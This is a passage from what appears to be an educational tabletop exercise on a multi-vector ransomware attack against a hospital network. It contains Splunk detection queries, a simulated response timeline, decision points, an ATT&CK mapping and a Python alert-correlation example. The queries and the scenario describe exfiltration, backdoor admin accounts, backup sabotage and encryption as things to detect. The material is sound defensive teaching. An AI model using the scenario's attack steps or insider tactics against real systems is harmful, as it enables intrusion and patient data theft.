    match(alert_name, "(?i)cloud|aws|azure"), "Cloud",
    match(alert_name, "(?i)ransomware|encrypt|malware"), "Ransomware",
    true(), "Other")
| bin _time span=1d
| stats count as alert_count,
        dc(alert_category) as category_count,
        values(alert_category) as categories,
        values(compromised_entity) as entities,
        min(_time) as first_alert,
        max(_time) as last_alert
  by _time
| where alert_count > 5 AND category_count >= 2
| table _time, alert_count, categories, category_count,
        entities, first_alert, last_alert

# SPL -- Detect medical device VLAN anomalous outbound traffic
index=firewall sourcetype=pan:traffic
  src_ip="10.30.*" NOT dest_ip="10.*"
  dest_port IN (443, 8443, 80)
| bin _time span=1h
| stats count as connection_count,
        dc(dest_ip) as unique_dest_ips,
        values(dest_ip) as destinations,
        sum(bytes_sent) as total_bytes
  by src_ip, _time
| where connection_count > 10 OR unique_dest_ips > 2
| table _time, src_ip, connection_count,
        unique_dest_ips, destinations, total_bytes

# SPL -- Detect cross-account role assumption anomalies
index=aws_cloudtrail sourcetype=aws:cloudtrail
  eventName="AssumeRole"
  (requestParameters.roleArn="*CrossAccount*"
   OR requestParameters.roleArn="*Integration*")
| spath output=assumed_role path=requestParameters.roleArn
| spath output=source_account path=userIdentity.accountId
| bin _time span=1h
| stats count as assume_count,
        dc(assumed_role) as unique_roles,
        values(assumed_role) as roles,
        values(sourceIPAddress) as source_ips
  by source_account, _time
| where assume_count > 5
| table _time, source_account, assume_count,
        unique_roles, roles, source_ips

# SPL -- Detect insider: privileged account creation
index=azure_ad sourcetype=azure:auditlogs
  operation_name="Add member to role"
| spath output=role_name path=targetResources{0}.displayName
| search role_name IN ("Domain Admins", "Enterprise Admins",
                        "Global Administrator")
| spath output=added_user path=targetResources{0}.userPrincipalName
| spath output=added_by path=initiatedBy.user.userPrincipalName
| eval account_type = if(match(added_user, "svc-"), "ServiceAccount", "UserAccount")
| table _time, added_by, added_user, role_name, account_type

# SPL -- Detect mass file encryption (ransomware)
index=edr sourcetype=crowdstrike:events
  (action="FileRenamed" OR action="FileModified")
  (file_name="*.crimson" OR file_name="*.encrypted")
| bin _time span=5m
| stats count as encrypted_files,
        dc(hostname) as unique_devices,
        values(hostname) as devices,
        min(_time) as first_seen,
        max(_time) as last_seen
  by _time
| where encrypted_files > 100 OR unique_devices > 5
| table _time, encrypted_files, unique_devices,
        devices, first_seen, last_seen

Incident Response

# Simulated incident response (educational only)
[Day 28, 04:00 UTC] ALERT: Coordinated Multi-Vector Attack response activated

[Day 28, 04:00 UTC] ACTION: Clinical safety assessment
  - Patient monitoring systems: OPERATIONAL (not targeted)
  - Ventilators: OPERATIONAL (not targeted)
  - Infusion pumps: OPERATIONAL (not targeted)
  - Emergency departments: Operational on paper downtime procedures
  - Surgical cases: Non-emergency surgeries postponed
  - Patient transfers: Divert to partner hospitals for imaging/labs

[Day 28, 04:30 UTC] ACTION: Network containment
  - Isolate all encrypted segments from network
  - Block C2 IPs (203.0.113.55, 203.0.113.77)
  - Disable svc-patch-mgmt domain admin account
  - Revoke all cross-account AWS roles (TeleMed integration)
  - Disable telemed-deploy-prod IAM user
  - Disconnect TeleMed AWS accounts from CHP Organization
  - Block medical device VLAN external access entirely
  - Disable VPN access for James Mitchell (insider suspect)

[Day 28, 05:00 UTC] ACTION: Evidence preservation
  - Memory captures from representative encrypted endpoints
  - Domain controller forensic images
  - Network traffic captures (last 48 hours)
  - AWS CloudTrail logs exported to forensic account
  - Azure AD sign-in and audit logs preserved
  - Firewall logs for medical device VLAN (full 30 days)

[Day 28, 06:00 UTC] ACTION: Multi-agency coordination
  - FBI Cyber Division: Healthcare critical infrastructure attack
  - HHS OCR: HIPAA breach notification (2.1M patients)
  - State Attorney General: Breach notification filed
  - Cyber insurance carrier: Claim filed, IR firm approved
  - VitalWatch Medical: Notified of supply chain compromise
  - Clinical trial sponsors: Notified of trial data breach

[Day 28, 12:00 UTC] ACTION: Recovery prioritization
  Priority 1: Epic EHR (12 hospitals on paper - patient safety risk)
  Priority 2: Laboratory information systems
  Priority 3: Pharmacy systems (medication safety)
  Priority 4: Radiology PACS (emergency imaging)
  Priority 5: Administrative systems

  Recovery: Clean rebuild from 45-day-old tape backups
  (insider sabotaged recent backup verification)
  Estimated full recovery: 21-30 days
  EHR partial recovery (read-only): 5-7 days

[Day 28, 18:00 UTC] ACTION: Insider investigation
  - James Mitchell interviewed by HR and legal counsel
  - Forensics: encrypted messaging, firewall changes, backup sabotage
  - Mitchell placed on administrative leave
  - Law enforcement referral for insider threat prosecution

[Day 35] FINAL IMPACT ASSESSMENT:
  Attack vectors: 4 (phishing, supply chain, cloud, insider)
  Patient records compromised: 2.1 million
  Clinical trials compromised: 3 Phase III studies (5,150 patients)
  Endpoints encrypted: 293 (47 contained by EDR)
  Hospitals with EHR downtime: 12, duration: 8 days to partial restore
  Financial impact estimate:
    Ransomware remediation and recovery: $45M
    HIPAA fines (potential): $25-50M
    Class action litigation reserve: $60M
    Clinical trial disruption costs: $15M
    Business interruption: $35M
    Total: $180-205M
  Ransom: NOT PAID (FBI recommendation)

Decision Points (Tabletop Exercise)

Decision Point 1 -- Alert Correlation vs. Individual Triage

Your SOC received alerts from all four vectors but triaged them individually. How do you implement cross-domain alert correlation that identifies coordinated campaigns? What SIEM correlation rules, threat intelligence enrichment, and analyst workflows would connect these dots within 24 hours?

Decision Point 2 -- Ransom Payment

The attacker demands 450 BTC ($28.5M) with a 72-hour deadline before publishing 2.1 million patient records. Backups are compromised and recovery from tape takes 21-30 days. Do you pay? What factors drive this decision? Who has authority? What are the legal, ethical, and operational implications?

Decision Point 3 -- Medical Device Supply Chain Trust

Vendor firmware was the entry point for Vector 2. How do you verify medical device firmware integrity independent of the vendor? Consider: independent firmware analysis, network behavior baselines, zero-trust device segmentation, and FDA cybersecurity guidance.

Decision Point 4 -- Insider Threat During M&A Integration

The TeleMed acquisition created security gaps, and an insider was recruited during organizational stress. How do you manage cybersecurity during M&A integration? What controls prevent insiders from sabotaging security infrastructure?

Lessons Learned

Key Takeaways

  1. Coordinated multi-vector attacks overwhelm single-team defenses -- When phishing, supply chain, cloud, and insider threats arrive simultaneously, a SOC that triages alerts individually will miss the coordinated campaign. Organizations need cross-domain correlation, automated enrichment, and exercises that train analysts to identify multi-vector campaigns.

  2. M&A integration is a critical attack surface -- Acquired organizations bring security debt into the parent organization. Hastily configured cross-account roles, unaligned security baselines, and incomplete EDR deployment create exploitable gaps. Security integration must be a gating criterion for M&A technical integration.

  3. Insider threats multiply the impact of external attacks -- An insider who sabotages backups, creates backdoor accounts, and weakens segmentation transforms a recoverable ransomware event into a catastrophic one. Defense: immutable backup architectures (air-gapped, append-only), separation of duties, behavioral analytics for privileged users, and multi-person authorization for security-critical changes.

  4. Medical device security requires zero-trust segmentation -- Devices with limited security capabilities must be treated as untrusted. Segmentation should prevent lateral movement regardless of firewall exceptions. Device behavior baselines should detect unexpected outbound connections.

  5. Backup integrity verification must be independent and immutable -- Verification processes must be independent of the systems they verify. Immutable copies (WORM storage, air-gapped tapes, cloud object lock) provide recovery even when backup infrastructure is compromised.

  6. Healthcare organizations face unique multi-stakeholder response challenges -- A healthcare breach involves patient safety, clinical continuity, HIPAA notification, FDA device reporting, clinical trial sponsor notification, law enforcement, cyber insurance, and board-level ransom decisions. IR plans must address all stakeholders.

MITRE ATT&CK Mapping

| Technique ID | Technique Name | Phase |
| --- | --- | --- |
| T1566.001 | Phishing: Spearphishing Attachment | Initial Access (Vector 1) |
| T1195.002 | Supply Chain: Software Supply Chain | Initial Access (Vector 2) |
| T1078.004 | Valid Accounts: Cloud Accounts | Initial Access (Vector 3) |
| T1098 | Account Manipulation | Persistence (Vector 4 insider) |
| T1136.003 | Create Account: Cloud Account | Persistence (backdoor admin) |
| T1550 | Use Alternate Authentication Material | Lateral Movement (token replay) |
| T1021.004 | Remote Services: SSH | Lateral Movement (device pivot) |
| T1530 | Data from Cloud Storage Object | Collection (S3 and Redshift) |
| T1213 | Data from Information Repositories | Collection (EHR, file shares) |
| T1567.002 | Exfiltration Over Web Service: Cloud Storage | Exfiltration (S3) |
| T1486 | Data Encrypted for Impact | Impact (ransomware) |
| T1490 | Inhibit System Recovery | Impact (backup destruction) |

Review Questions

Question 1

This scenario involved four simultaneous attack vectors. For each vector, identify the single most effective preventive control and the single most effective detective control. How do these controls interact and reinforce each other in a defense-in-depth architecture?

Question 2

The insider's sabotage of backup verification transformed a recoverable event into a catastrophe. Design an immutable backup architecture for a healthcare organization that remains recoverable even when a domain admin and a backup admin are both compromised.

Question 3

CHP's SOC had a 12% investigation rate on 2,400 daily alerts. All four vectors generated alerts that were individually dismissed. Design an alert correlation and prioritization system that surfaces coordinated campaigns. Consider: graph-based correlation, temporal clustering, entity-centric grouping, and automated threat intelligence enrichment.
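A starting point for the entity-centric, time-windowed correlation that Decision Point 1 and Question 3 ask for, written as an added example (not part of the original scenario). It links alerts from the four vectors through shared hosts, accounts and C2 IPs and only promotes a group to "campaign" when it spans more than one vector; the alert records, hostnames and the nurse/insider user names are constructed, while the IPs and account names come from the scenario.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from itertools import combinations

# Constructed sample alerts (synthetic, not real telemetry). "entities" are the
# hosts, accounts and IPs an alert touches. Hosts and the nurse/insider user
# names are made up; the IPs and service/IAM account names are scenario values.
ALERTS = [
    {"id": "A1", "src": "email_gw", "t": "2025-01-03T09:10", "vector": "phishing",
     "entities": {"host:WS-ICU-014", "user:nurse.ortega"}},
    {"id": "A2", "src": "edr", "t": "2025-01-03T09:42", "vector": "phishing",
     "entities": {"host:WS-ICU-014", "ip:203.0.113.55"}},           # C2 beacon
    {"id": "A3", "src": "firewall", "t": "2025-01-09T02:15", "vector": "supply_chain",
     "entities": {"host:vitalwatch-gw-03", "ip:203.0.113.77"}},    # device egress
    {"id": "A4", "src": "cloudtrail", "t": "2025-01-12T22:05", "vector": "cloud",
     "entities": {"user:telemed-deploy-prod", "ip:203.0.113.55"}},  # AssumeRole burst
    {"id": "A5", "src": "azure_ad", "t": "2025-01-14T17:30", "vector": "insider",
     "entities": {"user:svc-patch-mgmt", "user:j.mitchell"}},       # privileged role add
    {"id": "A6", "src": "edr", "t": "2025-01-15T01:00", "vector": "insider",
     "entities": {"user:svc-patch-mgmt", "host:WS-ICU-014", "host:vitalwatch-gw-03"}},
    {"id": "A7", "src": "edr", "t": "2025-01-20T10:00", "vector": "phishing",
     "entities": {"host:WS-HR-201"}},                               # unrelated alert
]

def correlate(alerts, window_days=30):
    """Union-find over alerts that share an entity within window_days; links are
    transitive, so a 28-day chain of pairwise-close alerts ends up in one group."""
    parent = {a["id"]: a["id"] for a in alerts}
    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path compression
            x = parent[x]
        return x
    when = {a["id"]: datetime.fromisoformat(a["t"]) for a in alerts}
    by_entity = defaultdict(list)
    for a in alerts:
        for e in a["entities"]:
            by_entity[e].append(a["id"])
    for ids in by_entity.values():
        for x, y in combinations(ids, 2):
            if abs(when[x] - when[y]) <= timedelta(days=window_days):
                parent[find(x)] = find(y)
    groups = defaultdict(list)
    for a in alerts:
        groups[find(a["id"])].append(a)
    campaigns = []
    for members in groups.values():
        vectors = {m["vector"] for m in members}
        if len(vectors) > 1:  # single-vector groups stay in normal per-team triage
            campaigns.append({"alerts": sorted(m["id"] for m in members),
                              "vectors": sorted(vectors),
                              "sources": sorted({m["src"] for m in members})})
    return campaigns
```

With the 30-day window the six linked alerts collapse into one campaign touching all four vectors and five log sources, while A7 stays a lone alert; shrinking the window to a day breaks every cross-vector link and returns no campaigns.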

Question 4

The attacker deliberately excluded life-safety medical devices from ransomware to avoid aggressive law enforcement response. How does this restraint complicate incident response? Does the absence of immediate patient harm change response urgency, ransom calculus, or regulatory notification timelines?